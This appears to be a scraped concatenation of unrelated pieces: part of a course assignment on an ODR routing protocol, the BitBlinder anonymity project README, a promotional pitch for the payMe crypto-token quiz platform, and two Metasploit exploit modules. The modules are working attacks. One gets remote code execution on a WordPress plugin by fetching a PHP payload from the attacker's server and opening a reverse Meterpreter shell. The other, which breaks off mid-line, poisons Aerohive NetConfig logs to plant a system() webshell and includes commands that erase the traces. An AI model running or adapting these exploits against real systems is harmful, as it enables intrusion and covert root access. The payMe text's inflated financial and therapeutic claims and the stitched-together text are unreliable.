also set. Intermediate nodes that receive such a forced discovery RREP must update their ‘forward’ route to the destination node accordingly, even if the new route is less efficient (i.e., has more hops) than the one they currently have in their routing table. This behaviour will cause a forced discovery RREQ to be responded to only by the destination node itself and not any other node, and will cause intermediate nodes to update their routing tables to both source and destination nodes in accordance with the latest routing information received, to cover the possibility that older routes are no longer valid because nodes and/or links along their paths have gone down. A type 2, application payload, message needs to contain the following type of information : type = 2 ‘canonical’ IP address of source node ‘port’ number of source application process (This, of course, is not a real port number in the TCP/UDP sense, but simply a value that ODR at the source node uses to designate the sun_path name for the source application’s domain socket.) ‘canonical’ IP address of destination node ‘port’ number of destination application process (This is passed to ODR by the application process at the source node when it calls msg_send. Its designates the sun_path name for an application’s domain socket at the destination node.) hop count (This starts at 0 and is incremented by 1 at each hop so that ODR can make use of the message to update its routing table, as discussed above.) number of bytes in application message The fields above essentially constitute a ‘header’ for the ODR message. Note that fields which you choose to have carry numeric values (rather than ascii characters, for example) must be in network byte order. ODR-defined numeric-valued fields in type 0, RREQ, and type 1, RREP, messages must, of course, also be in network byte order. Also note that only the ‘canonical’ IP addresses are used for the source and destination nodes in the ODR header. The same has to be true in the headers for type 0, RREQ, and type 1, RREP, messages. The general rule is that ODR messages only carry ‘canonical’ IP node addresses. The last field in the type 2 ODR message is essentially the data payload of the message. application message given in the call to msg_send An ODR protocol message is encapsulated as the data payload of an Ethernet frame whose header it fills in as follows : source address = Ethernet address of outgoing interface of the current node where ODR is processing the message. destination address = Ethernet broadcast address for type 0 messages; Ethernet address of next hop node for type 1 & 2 messages. protocol field = protocol value for the ODR PF_PACKET socket(s). Last but not least, whenever ODR writes an Ethernet frame out through its socket, it prints out on stdout the message ODR at node vm i1 : sending frame hdr src vm i1 dest addr ODR msg type n src vm i2 dest vm i3 where addr is in presentation format (i.e., hexadecimal xx:xx:xx:xx:xx:xx) and gives the destination Ethernet address in the outgoing frame header. Other nodes in the message should be identified by their vm name. A message should be printed out for each packet sent out on a distinct interface. ODR and the API When the ODR process first starts, it must construct a table in which it enters all well-known ‘port’ numbers and their corresponding sun_path names. These will constitute permanent entries in the table. Thereafter, whenever it reads a message off its domain socket, it must obtain the sun_path name for the peer process socket and check whether that name is entered in the table. If not, it must select an ‘ephemeral’ ‘port’ value by which to designate the peer sun_path name and enter the pair < port value , sun_path name > into the table. Such entries cannot be permanent otherwise the table will grow unboundedly in time, with entries surviving for ever, beyond the peer processes’ demise. We must associate a time_to_live field with a non-permanent table entry, and purge the entry if nothing is heard from the peer for that amount of time. Every time a peer process for which a non-permanent table entry exists communicates with ODR, its time_to_live value should be reinitialized. Note that when ODR writes to a peer, it is possible for the write to fail because the peer does not exist : it could be a ‘well-known’ service that is not running, or we could be in the interval between a process with a non-permanent table entry terminating and the expiration of its time_to_live value. Notes A proper implementation of ODR would probably require that RREQ and RREP messages be backed up by some kind of timeout and retransmission mechanism since the network transmission environment is not reliable. This would considerably complicate the implementation (because at any given moment, a node could have multiple RREQs that it has flooded out, but for which it has still not received RREPs; the situation is further complicated by the fact that not all intermediate nodes receiving and relaying RREQs necessarily lie on a path to the destination, and therefore should expect to receive RREPs), and, learning-wise, would not add much to the experience you should have gained from Assignment 2.
kans / BitBlinderThis is most of the source to the BitBlinder project. The goal was to allow people to communicate or share information in any form online anonymously with ease and quickly. To meet this end, it employed a novel micropayment system on top of a slightly modified Tor network. It is posted in the hope that someone may receive benefit from the work we did, though it is no longer maintained in any way and no BitBlinder network exists to the best of my knowledge. You will notice that private keys exist in places ( for the authority servers) though some may be missing in others. The BitBlinder network used a slightly modified Tor client which can be found in innomitor; this client is now dated. A highly modified version of the old BitTorrent Mainline is also included as well as an old portable FireFox. I apologize in advance for the bad code that we wrote and the bad code that we never fixed (read: Mainline). If you really want to see the whole thing go, you would need to: 1. set up your own authority servers, 2. compile an innomitor and put it on your system path. 3. Set up a BankServer. 4. Make the client run if it does not. I do not expect anyone to do this :) A final note: due to the nature of the software, we ran our own svn repo. We had a backup, but we used hotcopy with whatever version of svnserve existed on Ubuntu 9.10? two years ago. Remounting the repo was an exercise in frustration, so I instead used a maybe up to date checkout for the client (perhaps the last build we ever did, though perhaps not). Good luck!
payMeQuiz / PayMe ProjectpayMe is a technical solution initiated by some concerned Nigerians aimed to catalyze the innate desire in humans to fairly compete in an intellectual learning exercise. payMe is structured to more than engage users to learn but to incentivize users to be compelled to strive to achieve desired results on set targets. That in fact is the excelling value of payMe over competitions. payMe is originally a web2 play-to-earn (P2E) gaming application upgraded to a hybrid platform by the adoption of the platform's native utility token for incentivizing success among the quizzers. Play-to-earn (P2E) games are online games that guarantee rewards with real-world value to players for completing given task in a contest with other players. It comes with different structure and rewarding system. In the blockchain ecosystem, these rewards can be in the form of in-game assets like crypto tokens, virtual land, as well as the game assets (weapons, tools etc.) and other NFTs. The advent of web3 and its decentralized nature made it possible for players to buy, transfer and sell these in-game assets, outside of the games's traditional platform in exchange for real money. payMe is designed to encourage knowledge development using incentivization of success. payMe serve as cognitive behavioral therapy (CBT) to users who are psychogically affected by the disturbing examination malpractice permitted in the system, with the learn to earn functionality that catalyzes users desire to aspire to be the best in a transparent and meritorious form of testing knowledgeability. The transparent, honest, and undisputed fairness in determination of examinations success, aim also to promote hardwork as valuable asset to success as against luck dependency, in a society that eligizes game-of-chance about competency test. The Service payMe is designed for every interested adult netizen. The service is web-based and a communal crowdfunding scheme. The game is a test of knowledge, interactive quizzing in a multi-choice questions type. payMe™ is designed to play on web browsers enabling desktop and mobile applications. payMe is intentionally created with meritorious rewarding functionality to differ from the original pattern of the gaming industry, which is famously circumscribed by randomly selection of winners in a game of chance that is luck dependent. It is technically structured as an anti-gambling game with superlative uniqueness that distinguished it among competing brands. payMe is an ongoing concern product that will continue to meet users demands that aligns with our believes, principles and goals. The Service's Aim and Objectives The service's core aim is to create economic opportunities using ethical functionalities in a democratized software. Other objectives are: to incentivise intellectual competence. to encourage healthy and fair competition in the field of learning. to promote edifying research habits among scholars using the platform. to provide alternative healthy empowerment platform for gamesters suffering from addiction The Economic Benefit There are so many economic benefits to be derived from the payMe™ product brand. payMe guarantees regular, sustainable fiscal empowerment to users. It is a healthy alternative means of rewarding users’ passion in games. payMe is designed with the ability to enhance valuable learning exercises. Engaging in the contest can help in the reduction of common crimes incidental to youths. The Playing System The console adopts the multiple-choice questions type to create an interactive quizzing format. It offers online learning capabilities that cover extensive information on various academic subjects and soccer (FIFA competitions, leagues, and clubs’ activities). The service features an interactive learning interface and an intuitive time-bound quiz contest amongst participants. The service is deliberately created to differ from the original pattern of the gaming industry, which is luck-dependent, to an intellectual development contest. By this, payMe™ is ethical. Though it entails the use of cash to gain access, however, it guarantees much value for the little Token expended on every entry. payMe™ is designed to play on web browsers enabling desktop and mobile applications. It is playable everywhere with internet access on PC, Laptop, mobile phones, and other devices, if supported. Its technicality and structure make it superlatively unique among competing brands. payMe™ is an ongoing-concerned revolutionary software. The Process payMe™ can be subscribed to online. It entails an initial free membership registration and thereafter funding of a personal wallet with the platform’s native utility asset – the payME Pay Token (payME) Contestants automatically qualify to either make use of the premium entry to the quiz contest or use the payment option. Any of the quiz contests is a set of Ten (10) objective intra-changeable questions. Contestants are expected to provide correct answers to the questions within the swiftest timeframe. Each contestant’s result is displayed after the last question is answered on the contestants’ quiz page and thereafter, updated on the general result page. Weekly participation is limitless for contestants entering as regular quizzers but limited to 10 entries for the premium contestants. Only the best result amongst a Quizzer’s several attempts is registered for the contestant despite when it’s played each week. The first ranked 5% of the weekly contestants based on the most correct answers provided within the swiftest timeframe wins. The Playing Schedule Contests start every Monday at 12 am and end Saturday at 11.59 pm. From 12 am to 11.59 pm every Sunday, results are automatically displayed on the Result Page. The Web Portal Interface and Functions The web/mobile app has interactive interfaces and modules that help Quizzers easily glide through their activities. Some of these modules are described below: a. Wallet: A participant is expected to link his personal blockchain wallet after registration and fund it to enable him gain access to games. Only a decentralized crypto wallet is accepted. b. Quiz: This is 10 revolving questions, each having 4 objectives with 1 possible answer. When entering as a regular quizzer, once the play (ACE or COS) quiz button is clicked, $0.50 worth of payME Token will be debited from the quizzer’s wallet and credited to the platform’s wallet. Next, intra-changeable questions from the Question Bank will be appearing in non sequence routine. Quizzers are expected to provide the correct answers to each of the 10 questions as fast as they could and within 18 seconds. Immediately, after answering the 10th question, the quizzer’s result will display automatically on both the quizzing page and the general result dashboard. c. Tutorial Quiz: As the name implies, this is a free gaming zone created to enable holders of payMe token who may not want to engage in the contest, but want to improve their intellect through quizzing on the platform. However, the user must have payMe token worth $50 USD in his/her personal connected wallet to gain free access at anytime. d. Result Dashboard: this is a general result center for all Contestants. It updates automatically after each game is played during the play period, and according to the most correct answers within the swiftest time frame. That means that if a million quizzers scored 100/100, the system will display their result according to the fastest to answer the entire question using nanoseconds (an SI unit of time equal to one billionth of a second) in computing. So, be rest assured that it is impractical and impossible for 2 Quizzers to tally in the result. This makes payMe unique in the way winners are determined – fastest finger first! Updating of the dashboard however is programmed to freeze once it is 12 am every Sunday to determine the winners by publishing the result of the past week until 12 am on Monday when it continues its routine update. Available Rewards PayMe weekly quiz contest will commence by 12:00AM on Mondays and close by 11:59PM on Saturdays. Results are auto displayed on Sundays. the top most 5% of the participants are declared winners weekly and they are incentivized in ranges of: 1. The topmost 20% of the Winners earn 40% of the total revenue allocation to incentivizing pool in an equal share. 2. While the remaining 80% of the Winners earn 60% of the revenue share on an equal distribution rate. Practically, whatever revenue is generated weekly, 50% is automatically remitted to the incentivizing pool wallet and from there, the topmost 5% of the total participants are rewarded in the following ratio: 40% is equally shared to the topmost 20% while 60% is equally shared to the rest 80% of the winners. Winners claim button would automatically turn green by 12am every Sunday and they can claim their prizes themselves from their dashboard. Every Year, each of the 10 most intelligent Quizzers, drawn from the 52 weeks’ cumulative results of all participants in the ACE Quiz contests are rewarded with a Scholarship Award worth $1000 USDT in payME Token. Criteria is participating in every week of play. Cost of Play Cost of Game $0.50 worth of payME Token per game entry or with a single weekly subscription with payMe token worth $5. NB: The rewards are available for each quizzer's claim from Sunday at 12 am (according to the Nigerian calendar and time).
Nate0634034090 / Nate158g M W N L P D A O E### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def change_settings(cookie, token) vprint_status('Updating popular posts settings for images') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /<strong>Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"]*)/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?<ajax_nonce>[^"]*)/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\( "(?<wp_nonce>[^"]*)/ =~ res.body /},"post":{"id":(?<post_id>\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "<!-- wp:paragraph -->\n<p>#{Rex::Text.rand_text_alphanumeric(100..200)}</p>\n<!-- /wp:paragraph -->", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? "<tr id='meta-" end def boost_post(cookie, post_id, wp_nonce, post_count) # redirect as needed res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com/<take this value>/<and anything after> (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?<views>\d+) views</ =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen endend### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' => %q{ This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. NetConfig is the Aerohive/Extreme Networks HiveOS administrative webinterface. Vulnerable versions allow for LFI because they rely on a version of PHP 5 that is vulnerable to string truncation attacks. This module leverages this issue in conjunction with log poisoning to gain RCE as root. Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open. Closing the session should render the app responsive again. The module provides an automatic cleanup option to clean the log. However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed, may render the target (temporarily) unexploitable. This state can last over an hour. This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a. }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik de Jong', # github.com/eriknl - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-16152'], # still categorized as RESERVED ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => %w[linux unix], 'Arch' => [ ARCH_ARMLE, ARCH_CMD ], 'Targets' => [ [ 'Linux', { 'Arch' => [ARCH_ARMLE], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' } } ], [ 'CMD', { 'Arch' => [ARCH_CMD], 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target' } } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-02-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']), OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]), ] end def auto_clean_log datastore['AUTO_CLEAN_LOG'] end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php5') }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('Aerohive NetConfig UI') return CheckCode::Safe('Target is not an Aerohive NetConfig application.') end version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first unless version return CheckCode::Detected('Could not determine Aerohive NetConfig version.') end begin if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') return CheckCode::Appears("The target is Aerohive NetConfig version #{version}") else print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.') return CheckCode::Safe("The target is Aerohive NetConfig version #{version}") end rescue StandardError => e return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}") end end def poison_log password = rand_text_alphanumeric(8..12) @shell_cmd_name = rand_text_alphanumeric(3..6) @poison_cmd = "<?php system($_POST['#{@shell_cmd_name}']);?>" # Poison /tmp/messages print_status('Attempting to poison the log at /tmp/messages...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php5'), 'vars_post' => { 'login_auth' => 0, 'miniHiveUI' => 1, 'authselect' => 'Name/Password', 'userName' => @poison_cmd, 'password' => password } }) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages') end unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==') fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages') end print_status('Server responded as expected. Continuing...') end def on_new_session(session) log_cleaned = false if auto_clean_log print_status('Attempting to clean the log file at /tmp/messages...') print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.') begin # We need remove the line containing the PHP system call from /tmp/messages # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username. # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same: # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period. line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}" clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}" cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\ "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; 